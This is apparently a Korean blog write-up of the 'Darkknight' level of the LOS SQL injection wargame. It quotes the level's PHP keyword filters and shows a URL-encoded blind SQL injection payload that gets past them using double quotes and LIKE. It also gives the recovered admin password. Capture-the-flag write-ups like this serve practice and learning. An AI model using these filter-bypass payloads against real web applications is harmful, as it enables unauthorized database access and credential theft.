반응형
12.Darkknight 풀이.
필터링 된 것이 한 개가 아니다.
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");
싱글 쿼터['] substr ascii = 필터링이 되어 있다.
PW 부분을 사용하려면 [']을 사용해야 되지만, 막아놨으니 no쪽을 손봐야 될 거 같다.
즉 [']은 ["}로 대체되고, =은 부등호나 LIKE로 대체된다.
이 문제 역시 blind sql injection.
?pw=1234&no=123%20or%20id%20LIKE%20"admin"%20and%20length(pw)%20like%208
역시나 PW의 길이는 8.
blind sql injection의 전형적인 풀이를 하면 된다.
노가다로 하면 PW의 값이 1c62ba6f.
Cf) 문제는 풀렸고 여담이지만 PW의 길이는 8이고 blind sql injection 문제는 공식인 거 같다.
반응형
'# Related site issues > LOS' 카테고리의 다른 글
14.Giant. (0) | 2018.05.08 |
---|---|
13.Bugbear. (0) | 2018.05.08 |
11.Golem. (0) | 2018.05.07 |
10.Skeleton. (0) | 2018.05.07 |
9.Vampire. (0) | 2018.05.07 |